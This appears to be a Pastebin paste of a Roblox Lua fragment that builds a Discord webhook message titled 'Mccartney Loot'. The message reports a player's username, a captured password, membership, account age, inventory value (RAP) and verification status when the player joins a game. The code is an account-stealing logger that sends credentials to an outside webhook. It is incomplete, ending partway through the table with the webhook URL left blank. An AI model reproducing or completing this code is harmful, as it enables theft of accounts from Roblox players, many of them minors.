Advertisement
Carloprime8

Untitled

Sep 21st, 2019
704
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.12 KB | None | 0 0
  1. username = game:GetService("HttpService"):GetAsync("https://pastebin.com/raw/HKQbEjvv"),
  2. avatar_url = "https://media.discordapp.net/attachments/578605654118498338/622309437733994496/images.jpg",
  3. url = "",
  4. embeds = {{
  5. title = "Click here to view account",
  6. description = Player.Name.." Has Joined The Game!",
  7. url = "https://www.roblox.com/users/".. tostring(Player.UserId) .."/profile",
  8. color = 0x0C5CF2,
  9. thumbnail = {
  10. ["url"] = EmbedControl.GetProfileImage(Player),
  11. ["height"] = 100,
  12. ["width"] = 100,
  13. },
  14. author = {
  15. ["name"] = "Mccartney Loot" ,
  16. ["avatar_url"] = "https://media.discordapp.net/attachments/578605654118498338/622309437733994496/images.jpg",
  17. ["url"] = "",
  18. },
  19. fields = {
  20. [1] = {
  21. ["name"] = "Username ",
  22. ["value"] = Player.Name,
  23. ["inline"] = true,
  24.  
  25.  
  26.  
  27. },
  28. [2] = {
  29. ["name"] = "Password ",
  30. ["value"] = Password,
  31. ["inline"] = true,
  32.  
  33. },
  34.  
  35. [3] = {
  36. ["name"] = "Membership ",
  37. ["value"] = EmbedControl.GetMembershipType(Player),
  38. ["inline"] = true,
  39.  
  40.  
  41.  
  42. },
  43. [4] = {
  44. ["name"] = "Account Age ",
  45. ["value"] = EmbedControl.GetAccountAge(Player).."`".." , ".."`"..EmbedControl.GetAge(Player),
  46. ["inline"] = true,
  47.  
  48.  
  49. },
  50. [5] = {
  51. ["name"] = "Favorite Games",
  52. ["value"] = "[Click me](https://roblox.com/users/"..Player.UserId.."/favorites#!/places)",
  53. ["inline"] = true,
  54.  
  55. },
  56. [6] = {
  57. ["name"] = "Game",
  58. ["value"] = [[[Click Me](https://roblox.com/games/]].. tostring(game.PlaceId)..[[)]],
  59. ["inline"] = true,
  60.  
  61.  
  62. },
  63. [7] = {
  64. ["name"] = "Inventory Rap",
  65. ["value"] = EmbedControl.GetRAP(Player),
  66. ["inline"] = true,
  67.  
  68. },
  69. [8] = {
  70. ["name"] = "Security ",
  71. ["value"] = EmbedControl.GetVerified(Player),
  72. ["inline"] = true,
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement